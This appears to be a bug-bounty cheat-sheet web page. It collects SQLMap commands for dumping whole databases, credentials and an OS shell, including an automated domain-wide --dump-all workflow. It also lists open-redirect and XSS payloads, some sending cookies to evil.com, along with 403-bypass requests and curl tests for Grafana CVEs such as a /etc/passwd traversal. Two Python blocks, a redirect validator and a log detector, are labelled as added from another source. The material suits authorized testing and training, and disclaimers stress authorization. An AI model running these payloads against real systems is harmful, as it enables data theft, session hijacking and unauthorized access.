HackwithIndiaa

India's Biggest and Premier Free Live Hacking Event

Free Security Tools for Bug Bounty Hunters

Professional penetration testing tools for ethical hackers and cybersecurity professionals

Burp Suite Scope Creator - Free Online Tool

Generate Burp Suite scope configurations instantly for bug bounty programs. Create multiple target scopes for penetration testing and web application security assessment.

Perfect for ethical hackers, penetration testers, and bug bounty hunters using Burp Suite Professional or Community Edition. Save time on scope configuration for your security testing workflow.

Paste Domain or subdomain

Copy your scopes

Basic Regex - Matches specific TLD subdomains (.*\.domain\.com$)

Use this to find subdomains with a specific top-level domain extension

Advanced Regex - Matches any TLD (.*\.domain\..*$)

Use this to match domains across all top-level domain extensions (.com, .net, .org, etc.)

Most Advanced - Matches protocol and all subpaths ((^[^.]+:\/\/|[^\\.]+\.)domain.*)

Most comprehensive pattern that includes protocol (http/https) and matches all paths containing the domain

SQLMap Commands Guide

Essential SQLMap commands for SQL injection testing and database enumeration. Professional toolkit for ethical hackers and penetration testers.

Detect and Identify DBMS

Single URL detection with comprehensive testing

sqlmap -u "https://target.com/page.php?id=1" --batch --risk=3 --level=5 --random-agent --banner --is-dba --dbs

Dump Specific Database

Extract all data from a specific database

sqlmap -u "https://target.com/page.php?id=1" --batch --risk=3 --level=5 --random-agent -D dbname --dump

Dump Specific Table

Target specific tables within a database

sqlmap -u "https://target.com/page.php?id=1" --batch --risk=3 --level=5 --random-agent -D dbname -T tablename --dump

Dump Specific Columns

Extract specific columns from a table

sqlmap -u "https://target.com/page.php?id=1" --batch --risk=3 --level=5 --random-agent -D dbname -T tablename -C "id,username,password" --dump

Test Multiple Parameters

Automatically test all GET/POST parameters

sqlmap -u "https://target.com/page.php?id=1&cat=2" --batch --risk=3 --level=5 --random-agent -p "id,cat"

With Authentication Cookies

Test authenticated endpoints with session cookies

sqlmap -u "https://target.com/page.php?id=1" --batch --risk=3 --level=5 --random-agent --cookie="SESSION=xxxx"

With Custom Headers

Include custom HTTP headers for testing

sqlmap -u "https://target.com/page.php?id=1" --batch --risk=3 --level=5 --random-agent -H "X-Forwarded-For: 127.0.0.1" -H "Authorization: Bearer TOKEN"

POST Request Testing

Test POST parameters in request body

sqlmap -u "https://target.com/login" --data="user=test&pass=test" --batch --risk=3 --level=5 --random-agent

From Raw HTTP Request File

Use captured HTTP request from Burp Suite or similar tools

sqlmap -r request.txt --batch --risk=3 --level=5 --random-agent

Crawl and Test Website

Automatically crawl and test discovered links

sqlmap -u "https://target.com" --crawl=2 --batch --risk=3 --level=5 --random-agent

Enumerate Users and Privileges

Discover database users, passwords, and privileges

sqlmap -u "https://target.com/page.php?id=1" --batch --risk=3 --level=5 --random-agent --users --passwords --privileges

OS Shell Access

Attempt to gain operating system shell access (when allowed)

sqlmap -u "https://target.com/page.php?id=1" --batch --risk=3 --level=5 --random-agent --os-shell

Automated Domain-Wide SQL Injection Testing

Comprehensive workflow for testing an entire domain by collecting URLs, extracting parameters, and running automated SQLMap scans.

Complete Domain Testing Workflow

1. Collect URLs with Waymore

Gather all historical URLs from web archives for the target domain

waymore -i example.com -mode U -oU waymore_urls.txt

2. Filter URLs for SQL Injection Patterns

Use the gf tool to extract URLs matching SQL injection patterns and remove duplicates

cat waymore_urls.txt | gf sqli | sort -u > parameters.txt

3. Run SQLMap on All URLs

Test all collected parameterized URLs for SQL injection vulnerabilities

sqlmap -m parameters.txt --batch --risk=3 --level=5 --random-agent

4. Dump Everything If Vulnerable

If vulnerabilities are found, extract all available database content

sqlmap -m parameters.txt --batch --risk=3 --level=5 --random-agent --dump-all

Pro Tip: This workflow automates the discovery and testing of SQL injection vulnerabilities across an entire domain. Make sure to have sufficient storage as --dump-all can retrieve large amounts of data.

Disclaimer: These tools are intended for authorized security testing and ethical hacking only. Always obtain proper authorization before testing any system. Unauthorized access to computer systems is illegal.

Open Redirect Testing & Exploitation Guide

What Is an Open Redirect?

An Open Redirect occurs when a web application accepts unvalidated, user-controlled input that determines the destination URL for an HTTP redirect. If the application does not enforce strict validation or an allowlist of safe domains, attackers can manipulate the redirect to send users to arbitrary external sites.

Target Parameters:
  • redirect=, url=, next=
  • return=, dest=, r=
  • redir=, link=, goto=

20 Core Redirect Payloads for Initial Testing

Use these payloads against redirect parameters. Example: https://target.com/login?redirect=PAYLOAD_HERE

/https://evil.com
//evil.com
///evil.com
////evil.com
/%2F%2Fevil.com
/%0A/evil.com
/%09/evil.com
/%5c/evil.com
/.evil.com
/..%2F..%2Fevil.com
/https:evil.com
/https:/evil.com
/https://evil.com?param=1
/https://evil.com#frag
/https://evil.com%00
/https://trusted.com@evil.com
//trusted.com@evil.com
/https:///evil.com
/%2F%5Cevil.com
/https://evil.com//path

50 Open Redirect → XSS Payloads

Test whether the open redirect can execute JavaScript when its value is interpreted by URL-based DOM sinks or script handlers. If the redirect parameter accepts the javascript: or data: protocols, script execution is possible.

JavaScript Protocol Payloads

javascript:alert(1)
javascript://%0Aalert(1)
javascript:confirm(1)
javascript:prompt(1)
javascript:window.location='https://evil.com'
javascript:new Image().src='https://evil.com/?c='+document.cookie
javascript:fetch('https://evil.com/?c='+document.cookie)
javascript:(()=>alert(1))()
javascript:void(document.cookie)
javascript:document.body.innerHTML='<img src=x onerror=alert(1)>'
javascript:setTimeout('alert(1)',0)

Data URI Payloads

data:text/html,<script>alert(1)</script>
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
data:text/html,<svg onload=alert(1)>
data:text/html,<img src=x onerror='alert(1)'>
data:text/html,<body onload='alert(1)'></body>
data:text/html,<meta http-equiv=refresh content=0;url=javascript:alert(1)>

Encoded & Obfuscated Variants

%6A%61%76%61%73%63%72%69%70%74%3Aalert(1)
javascript:%26%230041%3Balert(1)
javascript:alert%28%31%29
data:text/html,%3Cscript%3Ealert(1)%3C/script%3E
jAvAsCrIpT:alert(1)
java\u0073cript:alert(1)

Hash / Fragment Injection

#javascript:alert(1)
?redirect=#javascript:alert(1)
#data:text/html,<script>alert(1)</script>

Protocol Mixing & Hybrid

https://trusted.com@javascript:alert(1)
https://trusted.com#javascript:alert(1)
http://trusted.com/%2F%2Fjavascript:alert(1)
vbscript:msgbox('XSS')
javascript:/*test*/alert(1)
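As an added defensive example (not code from the original page), the following Python validator implements the allowlist approach the Open Redirect section calls for and rejects the payload classes listed above, both the redirect payloads and the javascript:/data:/vbscript: XSS variants. It assumes the application's own origin is https://target.com/ and that this is the only host a redirect may land on.

```python
"""Allowlist-based redirect validation (added example, not code from the original page).

Assumption (not from the page): the application's own origin is https://target.com/
and that is the only host a redirect may land on.
"""
from urllib.parse import urljoin, urlsplit

SITE_BASE = "https://target.com/"   # assumed application origin
ALLOWED_HOSTS = {"target.com"}       # exact host match only, no suffix matching
SAFE_SCHEMES = {"http", "https"}
FALLBACK = "/"                       # where rejected inputs are sent instead


def resolve_redirect(user_input):
    """Return (accepted, url). `url` is always safe to put in a Location header;
    `accepted` tells the caller whether the user's choice was honoured or
    replaced by FALLBACK on our own origin.

    The raw parameter is never echoed: it is resolved against SITE_BASE with
    urljoin and the *result* must use http(s) and point at an allowlisted host.
    """
    fallback = (False, urljoin(SITE_BASE, FALLBACK))
    if not user_input:
        return fallback
    # Raw CR/LF/TAB/NUL etc.: header-injection risk, and URL parsers disagree on them.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in user_input):
        return fallback
    try:
        resolved = urljoin(SITE_BASE, user_input)
        parts = urlsplit(resolved)
    except ValueError:                 # e.g. malformed IPv6 literal in the host
        return fallback
    # javascript:, data:, vbscript: come out of urljoin with their own scheme and
    # fail the scheme check; //evil.com and https://trusted.com@evil.com fail the
    # host check (hostname is the part after any userinfo). /https://evil.com,
    # ///evil.com and the %2F / %5C variants resolve to paths on our own host.
    if parts.scheme not in SAFE_SCHEMES or parts.hostname not in ALLOWED_HOSTS:
        return fallback
    return (True, resolved)


if __name__ == "__main__":
    for p in ("/account", "//evil.com", "/https://evil.com",
              "javascript:alert(1)", "https://trusted.com@evil.com"):
        print(f"{p!r:34} -> {resolve_redirect(p)}")
```

Validate the exact string that will be emitted: if the framework percent-decodes the parameter before building the Location header, run the check on the decoded value instead.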

Security Warning: Open Redirect vulnerabilities can lead to serious security breaches including phishing attacks and account compromise. Always test responsibly and only on authorized systems with proper permissions.

403 Forbidden Bypass Techniques

When you encounter a 403 Forbidden error on restricted endpoints, these techniques can help bypass access controls during penetration testing. Test these methods to identify misconfigurations in access control implementations.

Using X-Original-URL Header

Bypass by sending the restricted path in the X-Original-URL header

Original Request (403)

GET /admin HTTP/1.1
Host: target.com

Bypass Request (200)

GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin

Appending %2e After First Slash

URL encode a dot after the first slash to bypass path-based restrictions

Original URL (403)

http://target.com/admin

Bypass URL (200)

http://target.com/%2e/admin

Path Manipulation with Dots, Slashes, and Semicolons

Add special characters to manipulate URL parsing and bypass filters

http://target.com/admin → 403

Try these bypasses:

http://target.com/secret/.
http://target.com//secret//
http://target.com/./secret/..
http://target.com/;/secret
http://target.com/.;/secret
http://target.com//;//secret

Add "..;/" After Directory Name

Use path traversal with semicolon to confuse path normalization

Original URL (403)

http://target.com/admin

Bypass URL (200)

http://target.com/admin..;/

Case Manipulation

Change letter cases if the server is case-insensitive but the filter is case-sensitive

Original URL (403)

http://target.com/admin

Bypass URL (200)

http://target.com/aDmIN

Via Web Cache Poisoning

Exploit caching mechanisms with the X-Original-URL header

GET /anything HTTP/1.1
Host: victim.com
X-Original-URL: /admin

Note: These bypass techniques exploit common misconfigurations in access control implementations. Success depends on the specific server configuration, web application framework, and security controls in place. Always perform testing within authorized scope only.

Grafana Security Manual Cheat Sheet

Comprehensive guide for testing Grafana installations against known CVEs and vulnerabilities. Essential for security researchers and penetration testers assessing Grafana deployments.

CVE-2021-43798

Directory Traversal for Arbitrary File Read

Explanation:

Grafana's static plugin file serving allows directory traversal via plugin paths, letting an unauthenticated attacker read arbitrary files (e.g., /etc/passwd). The script tests this against built-in plugins.

Affected Versions:

Grafana 8.0.0–8.3.0 (unpatched)

Script Test:

Attempts a GET request for each of several built-in plugins (alertlist, annolist, barchart, graph, table) against the path:

/public/plugins/<plugin>/../../../../../../etc/passwd

Manual Test:

curl -s https://<host>/public/plugins/alertlist/../../../../../../etc/passwd

Look for file indicators: root:, /bin/, :x:, daemon:

If present, directory traversal is confirmed.
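A defender-side complement to the manual test above, as an added example that is not part of the original cheat sheet: a small Python detector that flags traversal attempts against the plugin route in constructed access-log lines. It assumes the logging layer records the raw request target; a normalizing proxy may already have collapsed the `..` segments.

```python
"""Access-log detection for the Grafana plugin-path traversal above (added example,
not from the original cheat sheet). Assumes the logging layer records the raw
request target; a normalizing proxy may already have collapsed the '..' segments."""
import posixpath
import re
from urllib.parse import unquote

PLUGIN_PREFIX = "/public/plugins/"
# Request field of the combined log format: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines; no real hosts or deployments.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /public/plugins/alertlist/img/icon.svg HTTP/1.1" 200 1480
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /public/plugins/alertlist/../../../../../../etc/passwd HTTP/1.1" 200 2021
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /public/plugins/table/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hostname HTTP/1.1" 200 12
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /api/health HTTP/1.1" 200 49
"""

def decode_fully(text, rounds=3):
    """Percent-decode until stable (bounded) so %2e%2e and %252e%252e both surface as '..'."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def traversal_alerts(log_text):
    """One alert per request whose plugin sub-path contains a '..' segment."""
    alerts = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        path = decode_fully(match.group("target").split("?", 1)[0])
        if not path.startswith(PLUGIN_PREFIX):
            continue
        plugin, _, sub_path = path[len(PLUGIN_PREFIX):].partition("/")
        # Treat backslashes as separators too, to catch mixed-slash variants.
        if ".." not in sub_path.replace("\\", "/").split("/"):
            continue
        alerts.append({"src": line.split(" ", 1)[0], "plugin": plugin,
                       "resolved": posixpath.normpath(path)})  # where the '..' chain lands
    return alerts

for alert in traversal_alerts(SAMPLE_LOG):   # runs the detector over the sample lines
    print(alert)
```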

CVE-2025-4123

"Grafana Ghost" Path Traversal & Open Redirect (XSS)

Explanation:

The scanner calls this "Grafana Ghost". It combines an unvalidated redirect with path traversal, which may lead to XSS and external redirection.

Script Test:

Checks for unvalidated redirects and traversal:

/redirect?url=http://external-test-domain.example.com
/public/plugins/test/../../../

Manual Test:

Unvalidated redirect:

curl -I "https://<host>/redirect?url=https://evil.com"

Check whether the Location header points to the external domain. If the redirect occurs without validation → issue.

Path traversal:

curl -I "https://<host>/public/plugins/test/../../../"

Unexpected status or redirection indicates potential traversal.

CVE-2024-9264

DuckDB SQL Injection (Information Disclosure)

Explanation:

SQL injection in the experimental "SQL Expressions" feature, which uses a DuckDB backend. The script does not exploit it but flags the endpoint's presence.

Script Test:

POST /api/ds/query?ds_type=__expr__&requestId=security_scan

with a minimal SQL query.

Manual Test (auth needed):

  1. Authenticate to Grafana.
  2. Send expression query:
curl -sk -X POST "https://<host>/api/ds/query?ds_type=__expr__" \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <API_TOKEN>" \
  --data '{"queries":[{"refId":"A","type":"sql","expression":"SELECT 1"}]}'

If no authentication is required or the SQL executes, the vulnerability exists.

CVE-2018-15727

Authentication Bypass via Cookie Forging

Explanation:

An older vulnerability that allows bypassing the "remember me" cookie logic when LDAP/OAuth is used and a predictable cookie is generated.

Affected Versions:

Older than Grafana 5

Script Test:

Fetch login page HTML and look for:

ldap_enabled, ldap auth, oauth_client, oauth2, google_client_id

Manual Test:

Visit /login and inspect HTML for LDAP/OAuth login hints:

curl -s https://<host>/login | grep -Ei "ldap|oauth"

Presence suggests potential older bypass scenario.

CVE-2021-39226

Snapshot Enumeration

Explanation:

Predictable snapshot IDs allow enumeration of snapshots that shouldn't be public.

Script Test:

GET the following paths, trying small IDs:

/api/snapshots/1
/dashboard/snapshot/1

Manual Test:

curl -s https://<host>/api/snapshots/1
curl -s https://<host>/dashboard/snapshot/1

If response shows valid snapshot content → issue.

CVE-2020-11110

Snapshots Stored XSS

Explanation:

Stored XSS via the snapshot API if unauthenticated users can post snapshots containing JavaScript.

Script Test:

GET /api/snapshots

Manual Test:

curl -s https://<host>/api/snapshots

If it returns status 200 without auth → snapshot interface exposed → potential XSS.

CVE-2021-41174

AngularJS Expression Injection

Explanation:

AngularJS templating in old Grafana versions (≤8.3) may allow arbitrary expression injection via dashboard snapshot URLs.

Affected Versions:

Grafana ≤8.3

Script Test:

GET /dashboard/snapshot/{{constructor.constructor('return 1337')()}}?orgId=1

Manual Test:

curl -s "https://<host>/dashboard/snapshot/%7B%7Bconstructor.constructor('return%201337')()%7D%7D?orgId=1"

If rendered, AngularJS template injection is present.

CVE-2021-27358

Snapshot DoS via Unauthenticated POST

Explanation:

An unauthenticated POST to the snapshot API can cause denial-of-service problems.

Script Test:

POST to /api/snapshots with JSON.

Manual Test:

curl -sk -X POST https://<host>/api/snapshots \
  -H "Content-Type: application/json" \
  --data '{"name":"test"}'

If accepted without auth → issue.

Security Warning: These Grafana vulnerabilities can lead to serious security breaches including unauthorized file access, XSS attacks, SQL injection, and denial of service. Always test responsibly and only on authorized systems with proper permissions. Never exploit vulnerabilities on production systems without explicit authorization.